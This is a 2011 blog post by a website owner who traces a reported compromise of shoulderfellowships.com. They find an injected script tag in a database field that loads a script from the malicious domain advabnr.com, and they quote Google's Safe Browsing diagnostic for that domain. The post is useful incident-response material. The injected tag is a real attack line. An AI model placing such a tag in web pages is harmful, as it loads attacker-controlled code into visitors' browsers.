
www.advabnr.com malicious code

Last night I got an email saying that one of our websites, www.shoulderfellowships.com, had been hacked. I went online as soon as I could to check it out, but Google did not report any problems. The second place I looked was the McAfee SiteAdvisor page. This reported the following:

shoulderfellowships.com


We tested this site and didn't find any significant problems.

 

The next thing to check was Google Webmaster Tools, which has a malware reporting page. The results were:

 

Malware

Google has not detected any malware on this site.

 

Next, I decided to download the web logs to see if there were any SQL injection attempts or other hacking methods that would be picked up in the web logs. There was no evidence of any wrongdoing there.

The last thing I tried was to load up the website and see if my antivirus picked anything up. There was nothing reported there either. Finally, I checked every single page of the site, viewing the source code. On one page I found that a script tag had been added to a database field. The tag was this:

<script src=http://www.advabnr.com/b.js></script>

This bit of code was the same one that had been used to attack the website back in August 2008, so it looks like it could have been hidden in the site since then and not detected, or it might have been manually added to the database by a person who has registered for the website. The external script is not currently active, but some virus scanners still report a warning about the site.

If you Google advabnr.com you get the 'This site may harm your computer' message. Click on that link and the Google report says:

Safe Browsing

Diagnostic page for advabnr.com

What is the current listing status for advabnr.com?

Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

Of the 1 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-10-17, and the last time suspicious content was found on this site was on 2011-10-17.

This site was hosted on 1 network(s) including AS21740 (ENOMAS1).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, advabnr.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 6 domain(s), including moph.go.th/, choongang.co.kr/, software-developers.net/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.


So it looks like, even though Google have found SQL injection links to the site, there are no malicious scripts hosted on the site. If you Google "http:/www.advabnr. com/b.js" you get 28,000 results, which shows the extent of the infection. Most of these appear to have been added between June and October 2008.

Categories: Online Security

21 October 2011